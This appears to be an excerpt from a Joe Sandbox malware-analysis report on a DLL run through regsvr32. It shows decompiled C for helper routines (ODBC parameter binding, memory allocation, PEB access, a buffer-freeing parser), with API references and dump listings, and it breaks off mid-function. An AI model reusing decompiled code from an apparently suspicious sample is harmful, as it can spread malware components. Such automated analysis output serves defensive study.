    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

    Non-executed Functions

    C-Code - Quality: 40%
    			E10008B47(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12) {
    				signed int _t12;
    				intOrPtr* _t15;
    				void* _t18;
    				intOrPtr _t19;
    				intOrPtr _t23;
    				signed int _t24;
    				wchar_t* _t25;
    
    				_t12 = wcslen(_a12);
    				_t19 = _a4;
    				_t24 = _t12;
    				_t25 = E1000AA6C(_t19 + 0x18, 0xa + _t24 * 2);
    				wcscpy(_t25, _a12);
    				_t15 = E1000AA6C(_t19 + 0x1c, 0xc);
    				_t23 = _t24 + _t24;
    				 *_t15 = _t23;
    				_push(_t15);
    				_push(_t23 + 2);
    				_push(_t25);
    				_push(0);
    				_push(_t24);
    				_push(0xfffffff7);
    				_push(0xfffffff8);
    				_push(1);
    				_t18 = _a8 + 1;
    				_push(_t18);
    				_push( *((intOrPtr*)(_t19 + 8)));
    				L100073CB();
    				return _t18;
    			}










    0x10008b4e
    0x10008b53
    0x10008b57
    0x10008b6e
    0x10008b71
    0x10008b7c
    0x10008b84
    0x10008b87
    0x10008b89
    0x10008b8d
    0x10008b92
    0x10008b93
    0x10008b95
    0x10008b96
    0x10008b98
    0x10008b9a
    0x10008b9c
    0x10008b9d
    0x10008b9e
    0x10008ba1
    0x10008ba9

    APIs
    • wcslen.MSVCRT ref: 10008B4E
      • Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78
    • wcscpy.MSVCRT ref: 10008B71
    • SQLBindParameter.ODBC32(?,?,00000001,000000F8,000000F7,00000000,00000000,00000000,?,00000000), ref: 10008BA1
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    APIs
      • Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78
    • SQLBindParameter.ODBC32(?,?,00000001,000000FE,000000FD,?,00000000,?,?,00000000), ref: 10008F54
    • SQLBindParameter.ODBC32(?,?,00000001,000000FE,000000FC,?,00000000,?,?,00000000,?,?,00000001,000000FE,000000FD,?), ref: 10008F7B
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 37%
    			E1000909D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr* _t11;
    				void* _t13;
    				intOrPtr _t17;
    				intOrPtr _t18;
    				intOrPtr* _t19;
    
    				_t18 = _a4;
    				_t19 = E1000AA6C(_t18 + 0x18, 0x10);
    				 *_t19 = _a12;
    				 *((intOrPtr*)(_t19 + 4)) = _a16;
    				_t11 = E1000AA6C(_t18 + 0x1c, 0xc);
    				_t17 = 8;
    				_push(_t11);
    				_push(_t17);
    				_push(_t19);
    				_push(0);
    				_push(0);
    				_push(0xfffffffb);
    				 *_t11 = _t17;
    				_push(0xffffffe7);
    				_push(1);
    				_t13 = _a8 + 1;
    				_push(_t13);
    				_push( *((intOrPtr*)(_t18 + 8)));
    				L100073CB();
    				return _t13;
    			}








    0x1000909f
    0x100090b2
    0x100090b6
    0x100090bc
    0x100090c3
    0x100090cd
    0x100090ce
    0x100090cf
    0x100090d0
    0x100090d1
    0x100090d3
    0x100090d5
    0x100090d7
    0x100090dd
    0x100090df
    0x100090e1
    0x100090e2
    0x100090e3
    0x100090e6
    0x100090ed

    APIs
      • Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78
    • SQLBindParameter.ODBC32(?,?,00000001,000000E7,000000FB,00000000,00000000,00000000,00000008,00000000), ref: 100090E6
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 34%
    			E1000901D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr* _t9;
    				void* _t11;
    				intOrPtr _t14;
    				intOrPtr _t15;
    				intOrPtr* _t16;
    
    				_t15 = _a4;
    				_t16 = E1000AA6C(_t15 + 0x18, 0xc);
    				 *_t16 = _a12;
    				_t9 = E1000AA6C(_t15 + 0x1c, 0xc);
    				_t14 = 4;
    				_push(_t9);
    				_push(_t14);
    				_push(_t16);
    				_push(0);
    				_push(0);
    				_push(_t14);
    				 *_t9 = _t14;
    				_push(0xfffffff0);
    				_push(1);
    				_t11 = _a8 + 1;
    				_push(_t11);
    				_push( *((intOrPtr*)(_t15 + 8)));
    				L100073CB();
    				return _t11;
    			}








    0x1000901f
    0x10009032
    0x10009036
    0x1000903c
    0x10009046
    0x10009047
    0x10009048
    0x10009049
    0x1000904a
    0x1000904c
    0x1000904e
    0x1000904f
    0x10009055
    0x10009057
    0x10009059
    0x1000905a
    0x1000905b
    0x1000905e
    0x10009065

    APIs
      • Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78
    • SQLBindParameter.ODBC32(?,?,00000001,000000F0,00000004,00000000,00000000,00000000,00000004,00000000), ref: 1000905E
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 34%
    			E10008F87(intOrPtr _a4, intOrPtr _a8, long long _a12) {
    				intOrPtr* _t9;
    				void* _t11;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				long long* _t15;
    
    				_t14 = _a4;
    				_t15 = E1000AA6C(_t14 + 0x18, 0x10);
    				 *_t15 = _a12;
    				_t9 = E1000AA6C(_t14 + 0x1c, 0xc);
    				_t13 = 8;
    				_push(_t9);
    				_push(_t13);
    				_push(_t15);
    				_push(2);
    				_push(0);
    				_push(_t13);
    				 *_t9 = _t13;
    				_push(_t13);
    				_push(1);
    				_t11 = _a8 + 1;
    				_push(_t11);
    				_push( *((intOrPtr*)(_t14 + 8)));
    				L100073CB();
    				return _t11;
    			}








    0x10008f89
    0x10008f9f
    0x10008fa4
    0x10008fa6
    0x10008fb0
    0x10008fb1
    0x10008fb2
    0x10008fb3
    0x10008fb4
    0x10008fb6
    0x10008fb8
    0x10008fb9
    0x10008fbf
    0x10008fc0
    0x10008fc2
    0x10008fc3
    0x10008fc4
    0x10008fc7
    0x10008fce

    APIs
      • Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78
    • SQLBindParameter.ODBC32(?,?,00000001,00000008,00000008,00000000,00000002,00000000,00000008,00000000), ref: 10008FC7
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 34%
    			E10008FD1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr* _t9;
    				void* _t11;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				intOrPtr* _t15;
    
    				_t14 = _a4;
    				_t15 = E1000AA6C(_t14 + 0x18, 0xc);
    				 *_t15 = _a12;
    				_t9 = E1000AA6C(_t14 + 0x1c, 0xc);
    				_t13 = 4;
    				_push(_t9);
    				_push(_t13);
    				_push(_t15);
    				_push(0);
    				_push(0);
    				_push(6);
    				 *_t9 = _t13;
    				_push(7);
    				_push(1);
    				_t11 = _a8 + 1;
    				_push(_t11);
    				_push( *((intOrPtr*)(_t14 + 8)));
    				L100073CB();
    				return _t11;
    			}








    0x10008fd3
    0x10008fe9
    0x10008fee
    0x10008ff0
    0x10008ffa
    0x10008ffb
    0x10008ffc
    0x10008ffd
    0x10008ffe
    0x10009000
    0x10009002
    0x10009004
    0x1000900a
    0x1000900c
    0x1000900e
    0x1000900f
    0x10009010
    0x10009013
    0x1000901a

    APIs
      • Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78
    • SQLBindParameter.ODBC32(?,?,00000001,00000007,00000006,00000000,00000000,00000000,00000004,00000000), ref: 10009013
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 21%
    			E10009068(intOrPtr _a4, intOrPtr _a8) {
    				signed int* _t6;
    				void* _t9;
    				intOrPtr _t12;
    
    				_t12 = _a4;
    				_t6 = E1000AA6C(_t12 + 0x1c, 0xc);
    				_push(_t6);
    				 *_t6 =  *_t6 | 0xffffffff;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(1);
    				_push(0xc);
    				_push(0xfffffff8);
    				_push(1);
    				_t9 = _a8 + 1;
    				_push(_t9);
    				_push( *((intOrPtr*)(_t12 + 8)));
    				L100073CB();
    				return _t9;
    			}






    0x10009069
    0x10009073
    0x1000907a
    0x1000907b
    0x10009080
    0x10009081
    0x10009082
    0x10009087
    0x10009089
    0x1000908b
    0x1000908d
    0x1000908f
    0x10009090
    0x10009091
    0x10009094
    0x1000909a

    APIs
      • Part of subcall function 1000AA6C: HeapAlloc.KERNEL32(00000008,?,10008B6A,?,?,?), ref: 1000AA78
    • SQLBindParameter.ODBC32(?,?,00000001,000000F8,0000000C,00000001,00000000,00000000,00000000,00000000), ref: 10009094
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E100032DB() {
    
    				return  *[fs:0x30];
    			}



    0x00000000

    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 100%
    			E1000B8F0() {
    				void* _t69;
    				void* _t71;
    				void* _t73;
    				unsigned int _t74;
    				void* _t77;
    				void* _t78;
    				void* _t119;
    				void* _t127;
    				void* _t128;
    				void* _t132;
    				void* _t133;
    				void* _t134;
    				void* _t135;
    				void* _t136;
    				void* _t137;
    
    				_t69 = calloc(1, 8);
    				_t132 = _t69;
    				_t134 = _t133 + 8;
    				if(_t132 != 0) {
    					_t119 = calloc(1, 0x1f8);
    					_t135 = _t134 + 8;
    					 *_t132 = _t119;
    					if(_t119 != 0) {
    						_t71 = calloc(1, 0x17f8);
    						_t136 = _t135 + 8;
    						 *(_t132 + 4) = _t71;
    						if(_t71 != 0) {
    							 *((intOrPtr*)( *(_t132 + 4) + 0x3c)) = E1000FB60();
    							_t73 =  *(_t132 + 4);
    							if( *((intOrPtr*)(_t73 + 0x3c)) != 0) {
    								 *((intOrPtr*)(_t73 + 0x468)) = 0x10;
    								_t127 =  *(_t132 + 4);
    								_t74 =  *0x10017120; // 0x20
    								_t77 = malloc((_t74 >> 3) *  *(_t127 + 0x468));
    								_t137 = _t136 + 4;
    								 *(_t127 + 0x460) = _t77;
    								_t78 =  *(_t132 + 4);
    								if(_t77 != 0) {
    									 *((intOrPtr*)(_t78 + 0x40)) = 0;
    									_t128 = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x60)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xdf0)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x44)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x64)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xdf4)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x48)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x68)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xdf8)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x4c)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x6c)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xdfc)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x50)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x70)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xe00)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x54)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x74)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xe04)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x58)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x78)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xe08)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x5c)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0x7c)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xe0c)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xe0)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xe4)) = 0;
    									 *((intOrPtr*)( *(_t132 + 4) + 0xfc)) = 0;
    									do {
    										E100109F0( *(_t132 + 4) - 0xffffff80 + _t128);
    										_t128 = _t128 + 0xc;
    										_t137 = _t137 + 4;
    									} while (_t128 < 0x60);
    									 *((intOrPtr*)( *(_t132 + 4) + 0x38)) = 0;
    									E1000F670(_t132);
    									 *( *_t132) = 9;
    									return _t132;
    								} else {
    									E1000F9A0( *((intOrPtr*)(_t78 + 0x3c)));
    									free( *(_t132 + 4));
    									free( *_t132);
    									free(_t132);
    									return 0;
    								}
    							} else {
    								free(_t73);
    								free( *_t132);
    								free(_t132);
    								return 0;
    							}
    						} else {
    							free(_t119);
    							free(_t132);
    							return 0;
    						}
    					} else {
    						free(_t132);
    						return 0;
    					}
    				} else {
    					return _t69;
    				}
    			}


















    0x1000b8fc
    0x1000b8fe
    0x1000b900
    0x1000b905
    0x1000b914
    0x1000b916
    0x1000b919
    0x1000b91d
    0x1000b936
    0x1000b938
    0x1000b93b
    0x1000b940
    0x1000b95f
    0x1000b962
    0x1000b969
    0x1000b984
    0x1000b98e
    0x1000b991
    0x1000b9a1
    0x1000b9a7
    0x1000b9aa
    0x1000b9b2
    0x1000b9b5
    0x1000b9da
    0x1000b9e1
    0x1000b9e6
    0x1000b9f0
    0x1000b9fd
    0x1000ba07
    0x1000ba11
    0x1000ba1e
    0x1000ba28
    0x1000ba32
    0x1000ba3f
    0x1000ba49
    0x1000ba53
    0x1000ba60
    0x1000ba6a
    0x1000ba74
    0x1000ba81
    0x1000ba8b
    0x1000ba95
    0x1000baa2
    0x1000baac
    0x1000bab6
    0x1000bac3
    0x1000bacd
    0x1000bad7
    0x1000bae4
    0x1000baf1
    0x1000bafe
    0x1000bb08
    0x1000bb11
    0x1000bb16
    0x1000bb19
    0x1000bb1c
    0x1000bb25
    0x1000bb2c
    0x1000bb37
    0x1000bb41
    0x1000b9b7
    0x1000b9ba
    0x1000b9c8
    0x1000b9cc
    0x1000b9cf
    0x1000b9d9
    0x1000b9d9
    0x1000b96b
    0x1000b972
    0x1000b976
    0x1000b979
    0x1000b983
    0x1000b983
    0x1000b942
    0x1000b949
    0x1000b94c
    0x1000b956
    0x1000b956
    0x1000b91f
    0x1000b920
    0x1000b92e
    0x1000b92e
    0x1000b909
    0x1000b909
    0x1000b909

    APIs
    • calloc.MSVCRT ref: 1000B8FC
    • calloc.MSVCRT ref: 1000B912
    • free.MSVCRT(00000000), ref: 1000B920
    • calloc.MSVCRT ref: 1000B936
    • free.MSVCRT(00000000), ref: 1000B949
    • free.MSVCRT(00000000), ref: 1000B94C
      • Part of subcall function 1000FB60: calloc.MSVCRT ref: 1000FB64
    • free.MSVCRT(?), ref: 1000B972
    • free.MSVCRT(00000000), ref: 1000B976
    • free.MSVCRT(00000000), ref: 1000B979
    • malloc.MSVCRT ref: 1000B9A1
    • free.MSVCRT(?,?), ref: 1000B9C8
    • free.MSVCRT(00000000), ref: 1000B9CC
    • free.MSVCRT(00000000), ref: 1000B9CF
      • Part of subcall function 1000F670: memset.MSVCRT ref: 1000F6E8
      • Part of subcall function 1000F9A0: free.MSVCRT(?,00000000,1000B9BF,?), ref: 1000F9AC
      • Part of subcall function 1000F9A0: free.MSVCRT(1000B9BF,00000000), ref: 1000F9ED
    Memory Dump Source
    • Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
    • Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
    • Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
    • Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
    • Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
    • Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
    • Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd
    C-Code - Quality: 81%
    			E1000D430(void* __eflags, intOrPtr* _a4) {
    				void* _v8;
    				void* _v12;
    				void* _v128;
    				void* _v148;
    				void* _v152;
    				void* _v156;
    				void* _v160;
    				int _v168;
    				intOrPtr _v172;
    				signed int _v176;
    				void* _v180;
    				signed int _v184;
    				int _v188;
    				signed int _v192;
    				signed int _v196;
    				void* _t105;
    				void* _t110;
    				void* _t114;
    				signed int _t116;
    				void* _t122;
    				intOrPtr _t124;
    				void* _t128;
    				void* _t134;
    				unsigned int _t135;
    				void* _t138;
    				unsigned int _t139;
    				void* _t142;
    				void* _t144;
    				intOrPtr _t146;
    				void* _t149;
    				intOrPtr _t152;
    				intOrPtr _t163;
    				signed int _t164;
    				void* _t166;
    				intOrPtr* _t167;
    				void* _t168;
    				signed int _t169;
    				intOrPtr* _t172;
    				int _t174;
    				void* _t182;
    				intOrPtr* _t183;
    				signed int* _t191;
    				signed int* _t192;
    				signed int* _t193;
    
    				_t183 = _a4;
    				_t105 = E1000FC80( *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0x3c)),  &_v180,  *0x100171f0);
    				_t191 =  &(( &_v196)[3]);
    				if(_t105 != 0) {
    					__eflags = _v180;
    					_v192 = 0 | _v180 != 0x00000000;
    					_t110 = E1000FC80( *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0x3c)),  &_v196,  *0x100171f4);
    					_t192 =  &(_t191[3]);
    					__eflags = _t110;
    					if(_t110 == 0) {
    						goto L1;
    					} else {
    						_t114 = E1000FC80( *((intOrPtr*)( *((intOrPtr*)(_t183 + 4)) + 0x3c)),  &_v188,  *0x100171f8);
    						_t193 =  &(_t192[3]);
    						__eflags = _t114;
    						if(_t114 == 0) {
    							goto L1;
    						} else {
    							_t164 = _v196;
    							_t169 = _v192;
    							__eflags = _t164;
    							if(__eflags != 0) {
    								__eflags = _t164 - 3;
    								if(_t164 != 3) {
    									_t156 =  *((intOrPtr*)(_t183 + 4));
    									_t174 = _v188;
    									__eflags =  *( *((intOrPtr*)(_t183 + 4)) + 0x260 + _t164 * 4);
    									_v172 = _t169;
    									_t116 = 0 |  *( *((intOrPtr*)(_t183 + 4)) + 0x260 + _t164 * 4) == 0x00000000;
    									_v176 = _t164;
    									_v184 = _t116;
    									_v168 = _t174;
    									__eflags = _t164 - 2;
    									if(_t164 != 2) {
    										L27:
    										__eflags = _t116;
    										if(_t116 == 0) {
    											__eflags = _t164 - 6;
    											if(__eflags > 0) {
    												__eflags = _t174;
    												if(_t174 == 0) {
    													_v160 = 0;
    													goto L51;
    												} else {
    													_t128 = malloc(_t174);
    													_v160 = _t128;
    													goto L45;
    												}
    											} else {
    												switch( *((intOrPtr*)(_t164 * 4 +  &M1000D8B0))) {
    													case 0:
    														L51:
    														_t117 = _v156;
    														goto L52;
    													case 1:
    														_t133 = E100106C0( *((intOrPtr*)(_t156 + 0x3c)), _t174);
    														_t193 =  &(_t193[2]);
    														__eflags = _t133;
    														if(_t133 != 0) {
    															goto L42;
    														} else {
    															return _t133;
    														}
    														goto L94;
    													case 2:
    														__eflags = __edi;
    														if(__edi == 0) {
    															__eax = 0;
    															_v156 = 0;
    															L52:
    															_t170 =  *((intOrPtr*)(_t183 + 4));
    															__eflags =  *(_t170 + 0xe18);
    															if( *(_t170 + 0xe18) == 0) {
    																_t177 =  *(_t170 + 0x1c);
    																__eflags = _t177;
    																if(_t177 != 0) {
    																	_push( *((intOrPtr*)(_t170 + 0x34)));
    																	_push( &_v176);
    																	_push(_t183);
    																	 *_t177();
    																	_t164 = _v196;
    																	_t193 =  &(_t193[3]);
    																	_t117 = _v156;
    																}
    															}
    															__eflags = _t164 - 6;
    															if(_t164 > 6) {
    																L85:
    																_t118 = _v160;
    																goto L86;
    															} else {
    																switch( *((intOrPtr*)(_t164 * 4 +  &M1000D8CC))) {
    																	case 0:
    																		goto L85;
    																	case 1:
    																		goto L89;
    																	case 2:
    																		L86:
    																		__eflags = _t118;
    																		if(_t118 != 0) {
    																			free(_t118);
    																			goto L88;
    																		}
    																		goto L89;
    																	case 3:
    																		__eflags = _t117;
    																		if(_t117 != 0) {
    																			free(_t117);
    																			_t193 =  &(_t193[1]);
    																		}
    																		_t165 = _v152;
    																		__eflags = _t165;
    																		if(_t165 == 0) {
    																			L66:
    																			_t125 = _v148;
    																		} else {
    																			_t176 = 0;
    																			__eflags = _t165;
    																			if(_t165 == 0) {
    																				goto L66;
    																			} else {
    																				_t125 = _v148;
    																				do {
    																					_t171 =  *(_t125 + 4 + _t176 * 8);
    																					__eflags = _t171;
    																					if(_t171 != 0) {
    																						free(_t171);
    																						_t125 = _v148;
    																						_t193 =  &(_t193[1]);
    																						_t165 = _v152;
    																					}
    																					_t176 = _t176 + 1;
    																					__eflags = _t176 - _t165;
    																				} while (_t176 < _t165);
    																			}
    																		}
    																		__eflags = _t125;
    																		if(_t125 != 0) {
    																			free(_t125);
    																			goto L88;
    																		}
    																		goto L89;
    																	case 4:
    																		__ecx = _v12;
    																		__eflags = __ecx;
    																		if(__ecx == 0) {
    																			L76:
    																			__eax = _v8;
    																		} else {
    																			__edi = 0;
    																			__eflags = __ecx;
    																			if(__ecx == 0) {
    																				goto L76;
    																			} else {
    																				__eax = _v8;
    																				__ebx = 0;
    																				__eflags = 0;
    																				do {
    																					__edx =  *(__ebx + __eax + 0x20);
    																					__eflags = __edx;
    																					if(__edx != 0) {
    																						free(__edx);
    																						__eax = _v8;
    																						__esp = __esp + 4;
    																						__ecx = _v12;
    																					}
    																					__edi = __edi + 1;
    																					__ebx = __ebx + 0x28;
    																					__eflags = __edi - __ecx;
    																				} while (__edi < __ecx);
    																			}
    																		}
    																		__eflags = __eax;
    																		if(__eax != 0) {
    																			free(__eax);
    																			goto L88;
    																		}
    																		goto L89;
    																	case 5:
    																		__edi = free;
    																		__eflags = __eax;
    																		if(__eax != 0) {
    																			free(__eax);
    																		}
    																		__eax = _v152;
    																		__eflags = __eax;
    																		if(__eax != 0) {
    																			free(__eax);
    																		}
    																		__eax = _v128;
    																		__eflags = __eax;
    																		if(__eax != 0) {
    																			free(__eax);
    																			L88:
    																			_t193 =  &(_t193[1]);
    																		}
    																		goto L89;
    																}
    															}
    															goto L89;
    														} else {
    															_v156 = malloc(__edi);
    															L45:
    															_t195 =  &(_t193[1]);
    															__eflags = _t128;
    															if(_t128 != 0) {
    																_t129 = E1000FB70( *((intOrPtr*)(_t156 + 0x3c)), _t128, _t174);
    																_t193 =  &(_t195[3]);
    																__eflags = _t129;
    																if(_t129 != 0) {
    																	goto L42;
    																} else {
    																	goto L49;
    																}
    															} else {
    																 *((intOrPtr*)( *_t183)) = 8;
    																goto L47;
    															}
    														}
    														goto L94;
    													case 3:
    														__eax =  &_v160;
    														__eax = E1000E130(__eflags, __esi,  &_v160);
    														__eflags = __eax;
    														if(__eax != 0) {
    															goto L42;
    														} else {
    															_pop(__edi);
    															_pop(__ebx);
    															return __eax;
    														}
    														goto L94;
    													case 4:
    														__eax =  &_v160;
    														_push( &_v160);
    														_push(__esi);
    														__eax = E1000D8F0();
    														__esp = __esp + 8;
    														__eflags = __eax;
    														if(__eax != 0) {
    															goto L42;
    														} else {
    															_pop(__edi);
    															_pop(__ebx);
    															return __eax;
    														}
    														goto L94;
    													case 5:
    														__eax =  &_v160;
    														__eax = E1000DC00(__eflags, __esi,  &_v160);
    														__eflags = __eax;
    														if(__eax == 0) {
    															L47:
    															__eflags = 0;
    															return 0;
    														} else {
    															L42:
    															_t164 = _v196;
    															goto L51;
    														}
    														goto L94;
    												}
    											}
    										} else {
    											_t134 = E100106C0( *((intOrPtr*)(_t156 + 0x3c)), _t174);
    											_t193 =  &(_t193[2]);
    											__eflags = _t134;
    											if(_t134 != 0) {
    												goto L89;
    											} else {
    												return _t134;
    											}
    										}
    									} else {
    										_t135 =  *0x10017120; // 0x20
    										_t138 = E1000FB70( *((intOrPtr*)(_t156 + 0x3c)),  &_v160, _t135 >> 3);
    										_t193 =  &(_t193[3]);
    										__eflags = _t138;
